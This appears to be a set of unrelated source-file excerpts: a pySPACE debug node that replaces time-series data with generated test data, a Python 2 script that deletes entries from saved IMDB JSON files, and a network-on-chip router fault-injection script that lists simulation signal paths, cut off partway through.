### document changes in doc/api.rst
###
### make sure the number is never decreased
###
woo.core.Master.instance.api=10102
###
###
###
|
pyspace/test | refs/heads/master | pySPACE/missions/nodes/debug/exchange_data.py | 1 | """Exchange the data against some self created data
"""
from pySPACE.missions.nodes.base_node import BaseNode
from pySPACE.resources.data_types.time_series import TimeSeries
from pySPACE.tests.utils.data.test_data_generation import *
class ExchangeDataNode(BaseNode):
"""Exchange the data against some self created data
This can be used for testing/debugging purposes,
if the markers etc should be retained,
but the data should be replaced by data with known properties.
**Parameters**
:generator_expression:
Specify generator expression. Uses the data generators in :mod:`~pySPACE.tests.utils.data.test_data_generation`.
(*optional, default: "Adder([One(),Multiplier([Constant(200),Channel(data.shape[1],data.shape[0])]),TimePoint(data.shape[1],data.shape[0])])"*)
**Exemplary Call**
.. code-block:: yaml
-
node : Exchange_Data
parameters :
generator_expression : "One()"
:Authors: Hendrik Woehrle ([email protected])
:Created: 2012/04/20
"""
def __init__(self,
generator_expression = "Adder([One(),Multiplier([Constant(200),Channel(data.shape[1],data.shape[0])]),TimePoint(data.shape[1],data.shape[0])])",
**kwargs):
super(ExchangeDataNode, self).__init__(*kwargs)
self.set_permanent_attributes(ts_generator = TestTimeSeriesGenerator(),
generator = None,
generator_expression = generator_expression)
def _execute(self, data):
"""
Exchanges the data with some manually generated data.
"""
if self.generator is None:
self.generator = eval(self.generator_expression)
self.data_item = \
self.ts_generator.generate_test_data(
channels=data.shape[1],
time_points=data.shape[0],
function=self.generator,
sampling_frequency=data.sampling_frequency,
channel_order=True,
channel_names=data.channel_names,
dtype=numpy.float)
result_time_series = TimeSeries.replace_data(data, self.data_item)
return result_time_series
_NODE_MAPPING = {"Exchange_Data": ExchangeDataNode}
|
at1as/IMDB-Scrape | refs/heads/master | scripts/remove_entry.py | 2 | #!/usr/bin/env python
# -*- coding: utf8 -*-
# Remove saved entries from saved json repositories
# Useful for entries that have been tagged incorrectly
from __future__ import unicode_literals
import os
import re
import sys
import json
from unicodedata import normalize
def relative_path(file_path):
# Get path relative to this file
current_dir = os.path.dirname(__file__)
return os.path.join(current_dir, file_path)
# Import Environment Configuration
try:
with open(relative_path('../conf.json')) as config_json:
config = json.load(config_json)
except Exception as ex:
print "\nInvalid JSON body in conf.json\nSee: http://jsonformatter.curiousconcept.com/ for assistance {}\n".format(ex)
raise SystemExit
DATA = [
config['assets']['movies']['saved_data'],
config['assets']['series']['saved_data']
]
HELP = """\nUsage:
python remove_entry.py [type] "<filename>" [year]
\n[type] :
-m, --movie \t\t=> movie
-s, --series \t\t=> series
\n[year] :
- four digit year
- The [year] field is optional. If not passed, first matching title will be deleted
\nExamples:
python remove_entry.py -m "Monty Python and the Holy Grail"
python remove_entry.py --series "Six Feet Under" 2001
\nNote:
- Use single quotes around title if it contains special characters (such as '!')
- The [year] field is optional. If not passed, first matching title will be deleted\n"""
def sanitize(string):
return re.sub("\s{2,}", " ", string.lower().replace(':', '').replace('-', '').strip())
def remove_file(filetype, asset_name, year):
if filetype in ['-m', '--movie']:
filename = DATA[0]
elif filetype in ['-s', '--series']:
filename = DATA[1]
else:
print HELP
return
if os.path.isfile(relative_path('../' + filename)):
found = False
with open(relative_path('../' + filename), 'r') as saved_asset_list:
saved_assets = json.load(saved_asset_list)
# Delete entry
try:
for key in saved_assets:
if sanitize(saved_assets[key]['title']) == sanitize(asset_name):
# Find entry matching year if arg is passed, else delete first matching title found
if year is None or (saved_assets[key]['year'] == year):
del saved_assets[key]
found = True
break
if not found:
year_arg = year or "any year"
print "\nEntry not found: \"%s\" for %s in \"%s\"\n" % (asset_name, year or "any year", filename)
return
except KeyError:
print "\nEntry not found: \"%s\" in \"%s\"\n" % (asset_name, filename)
return
# Write contents to JSON file
with open(relative_path('../' + filename), 'w+') as asset_feed:
json.dump(saved_assets, asset_feed, encoding="utf-8", indent=4)
print "\nEntry deleted: \"%s\" from \"%s\"\n" % (asset_name, filename)
return
else:
print "\nFile not found: \"%s\"\n" % filename
return
if __name__ == "__main__":
try:
if sys.argv[1] in ["-h", "--help", "--h", " "]:
print HELP
else:
if len(sys.argv) == 4:
remove_file(sys.argv[1], normalize("NFC", sys.argv[2].decode('UTF-8')), sys.argv[3])
else:
# Year arg was passed
remove_file(sys.argv[1], normalize("NFC", sys.argv[2].decode('UTF-8')), None)
except IndexError:
print HELP
|
siavooshpayandehazad/NoC_Router | refs/heads/master | Scripts/include/fault_injector_do.py | 3 | import random
import sys
import numpy
from Scripts.include.package import *
#----------------------------------------------------------------------------------------------
#
# Fault Class
#
#----------------------------------------------------------------------------------------------
class fault:
location = None
bitwidth = None
Type = None
mean_time = None
std_dev = None
shut_down_time = None
def __init__(self, loc, width, fault_type, mean_time, std_dev, shut_down_time):
if width > 1:
random_position = random.randint(0, width-1)
self.location = loc+"("+str(random_position)+")"
else:
self.location = loc
self.bitwidth = width
self.Type = fault_type
self.mean_time = mean_time
self.std_dev = std_dev
self.shut_down_time = shut_down_time
def report(self):
"""
The fault reports its location, signal width, type, MTBF, STD_Dev and shutdown time!
"""
print "Location: ", self.location, "\twidth: ", self.bitwidth, "\tfault_type: ", '%5s' %self.Type,\
"\tMTBF: ", self.mean_time, "\tstd deviation: ", self.std_dev , "\tshutdown time", \
self.shut_down_time
#----------------------------------------------------------------------------------------------
#
# Other functions
#
#----------------------------------------------------------------------------------------------
def report_faults(fault_list):
"""
Reports all the faults in the fault list
"""
print "---------------------------------------"
print "fault injection points:"
for fault in fault_list:
fault.report()
print "---------------------------------------"
#----------------------------------------------------------------------------------------------
# Generating signals for different modules
# for this purpose we only consider fault injection points marked with X:
#
# .-------------.
# .----> | Checkers | <---.
# | | Module | |
# | '-------------' |
# | ^ |
# | | |
# | X |
# | .-------------. |
# | | Module | |
# -----o----->| under |--X--o------->
# | check |
# '-------------'
#
#----------------------------------------------------------------------------------------------
def list_all_the_links(network_size):
"""
takes the network size and returns a list of all the RX signals in the network
"""
list_of_ports = []
list_of_widths = []
for i in range(0, network_size*network_size):
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":RX_L")
list_of_widths.append(32)
if i/network_size != 0:
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":RX_N")
list_of_widths.append(32)
if i/network_size != network_size-1:
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":RX_S")
list_of_widths.append(32)
if i%network_size != 0:
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":RX_W")
list_of_widths.append(32)
if i%network_size != network_size-1:
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":RX_E")
list_of_widths.append(32)
return list_of_ports, list_of_widths
def list_all_the_lbdr_signals(network_size):
"""
takes the network size and returns a list of all the relevant LBDR signals in the network
"""
list_of_ports = []
list_of_widths = []
# Every router has the Local port
for i in range(0, network_size*network_size):
# internal signals of LBDR with packet drop
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":LBDR_L:N1")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":LBDR_L:E1")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":LBDR_L:W1")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":LBDR_L:S1")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":LBDR_L:Req_N_in")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":LBDR_L:Req_E_in")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":LBDR_L:Req_W_in")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":LBDR_L:Req_S_in")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":LBDR_L:Req_L_in")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":LBDR_L:grants")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":LBDR_L:packet_drop_in")
# output signal(s) of LBDR with packet drop
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":LBDR_L:packet_drop_order")
list_of_widths += [1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1]
# for i in range(0, network_size*2):
if i/network_size != 0: # has port N
# internal signals of LBDR with packet drop
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":LBDR_N:N1")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":LBDR_N:E1")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":LBDR_N:W1")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":LBDR_N:S1")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":LBDR_N:Req_N_in")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":LBDR_N:Req_E_in")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":LBDR_N:Req_W_in")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":LBDR_N:Req_S_in")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":LBDR_N:Req_L_in")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":LBDR_N:grants")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":LBDR_N:packet_drop_in")
# output signal(s) of LBDR with packet drop
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":LBDR_N:packet_drop_order")
list_of_widths += [1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1]
if i/network_size != network_size-1: # has port S
# internal signals of LBDR with packet drop
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":LBDR_S:N1")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":LBDR_S:E1")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":LBDR_S:W1")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":LBDR_S:S1")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":LBDR_S:Req_N_in")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":LBDR_S:Req_E_in")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":LBDR_S:Req_W_in")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":LBDR_S:Req_S_in")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":LBDR_S:Req_L_in")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":LBDR_S:grants")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":LBDR_S:packet_drop_in")
# output signal(s) of LBDR with packet drop
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":LBDR_S:packet_drop_order")
list_of_widths += [1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1]
if i%network_size != 0: # has port W
# internal signals of LBDR with packet drop
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":LBDR_W:N1")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":LBDR_W:E1")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":LBDR_W:W1")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":LBDR_W:S1")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":LBDR_W:Req_N_in")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":LBDR_W:Req_E_in")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":LBDR_W:Req_W_in")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":LBDR_W:Req_S_in")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":LBDR_W:Req_L_in")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":LBDR_W:grants")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":LBDR_W:packet_drop_in")
# output signal(s) of LBDR with packet drop
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":LBDR_W:packet_drop_order")
list_of_widths += [1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1]
if i%network_size != network_size-1: # has port E
# internal signals of LBDR with packet drop
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":LBDR_E:N1")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":LBDR_E:E1")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":LBDR_E:W1")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":LBDR_E:S1")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":LBDR_E:Req_N_in")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":LBDR_E:Req_E_in")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":LBDR_E:Req_W_in")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":LBDR_E:Req_S_in")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":LBDR_E:Req_L_in")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":LBDR_E:grants")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":LBDR_E:packet_drop_in")
# output signal(s) of LBDR with packet drop
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":LBDR_E:packet_drop_order")
list_of_widths += [1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1]
return list_of_ports, list_of_widths
def list_all_the_arbiter_signals(network_size):
"""
takes the network size and returns a list of all the relevant arbiter signals in the network
"""
list_of_ports = []
list_of_widths = []
# Every router has the Local port
for i in range(0, network_size*network_size):
# Output signals of Allocator related to output N
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:valid_L")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:grant_L_N") # The _signal should have fault injected or the main one ? i.e. grant_N_N or grant_N_N_signal ?! Because checker is checking grant_N_N_sig.
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:grant_L_E")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:grant_L_W")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:grant_L_S")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:grant_L_L")
# Internal signals of Allocator related to output N
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:credit_counter_L_in")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:credit_counter_L_out")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:grant_L")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:X_N_L")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:X_E_L") # Input E requesting Output L ?!
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:X_W_L")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:X_S_L")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:X_L_L")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:grant_L_N_sig") # ??
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:grant_L_E_sig")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:grant_L_W_sig")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:grant_L_S_sig")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:grant_L_L_sig")
list_of_widths += [1, 1, 1, 1, 1, 1, 2, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1]
# for i in range(0, network_size*2):
if i/network_size != 0: # has port N
# Output signals of Allocator related to output N
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:valid_N")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:grant_N_N") # The _signal should have fault injected or the main one ? i.e. grant_N_N or grant_N_N_signal ?! Because checker is checking grant_N_N_sig.
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:grant_N_E")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:grant_N_W")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:grant_N_S")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:grant_N_L")
# Internal signals of Allocator related to output N
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:credit_counter_N_in")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:credit_counter_N_out")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:grant_N")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:X_N_N")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:X_E_N") # Input E requesting Output N ?!
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:X_W_N")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:X_S_N")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:X_L_N")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:grant_N_N_sig") # ??
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:grant_N_E_sig")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:grant_N_W_sig")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:grant_N_S_sig")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:grant_N_L_sig")
list_of_widths += [1, 1, 1, 1, 1, 1, 2, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1]
if i/network_size != network_size-1: # has port S
# Output signals of Allocator related to output S
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:valid_S")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:grant_S_N") # The _signal should have fault injected or the main one ? i.e. grant_N_N or grant_N_N_signal ?! Because checker is checking grant_N_N_sig.
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:grant_S_E")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:grant_S_W")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:grant_S_S")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:grant_S_L")
# # Internal signals of Allocator related to output S
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:credit_counter_S_in")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:credit_counter_S_out")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:grant_N")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:X_N_S")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:X_E_S") # Input E requesting Output S ?!
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:X_W_S")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:X_S_S")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:X_L_S")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:grant_S_N_sig") # ??
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:grant_S_E_sig")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:grant_S_W_sig")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:grant_S_S_sig")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:grant_S_L_sig")
list_of_widths += [1, 1, 1, 1, 1, 1, 2, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1]
if i%network_size != 0: # has port W
# Output signals of Allocator related to output W
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:valid_W")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:grant_W_N") # The _signal should have fault injected or the main one ? i.e. grant_N_N or grant_N_N_signal ?! Because checker is checking grant_N_N_sig.
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:grant_W_E")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:grant_W_W")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:grant_W_S")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:grant_W_L")
# # Internal signals of Allocator related to output W
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:credit_counter_W_in")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:credit_counter_W_out")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:grant_W")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:X_N_W")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:X_E_W") # Input E requesting Output W ?!
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:X_W_W")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:X_S_W")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:X_L_W")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:grant_W_N_sig") # ??
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:grant_W_E_sig")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:grant_W_W_sig")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:grant_W_S_sig")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:grant_W_L_sig")
list_of_widths += [1, 1, 1, 1, 1, 1, 2, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1]
if i%network_size != network_size-1: # has port E
# Output signals of Allocator related to output E
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:valid_E")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:grant_E_N") # The _signal should have fault injected or the main one ? i.e. grant_N_N or grant_N_N_signal ?! Because checker is checking grant_N_N_sig.
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:grant_E_E")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:grant_E_W")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:grant_E_S")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:grant_E_L")
# # Internal signals of Allocator related to output E
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:credit_counter_E_in")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:credit_counter_E_out")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:grant_E")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:X_N_E")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:X_E_E")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:X_W_E") # Input W requesting Output E ?!
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:X_S_E")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:X_L_E")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:grant_E_N_sig") # ??
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:grant_E_E_sig")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:grant_E_W_sig")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:grant_E_S_sig")
list_of_ports.append("tb_network_"+str(network_size)+"x"+str(network_size)+":NoC:R_"+str(i)+":allocator_unit:grant_E_L_sig")
list_of_widths += [1, 1, 1, 1, 1, 1, 2, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1]
return list_of_ports, list_of_widths
def list_all_the_fifo_signals(network_size):
"""
takes the network size and returns a list of all the relevant FIFO signals in the network
"""
list_of_ports = []
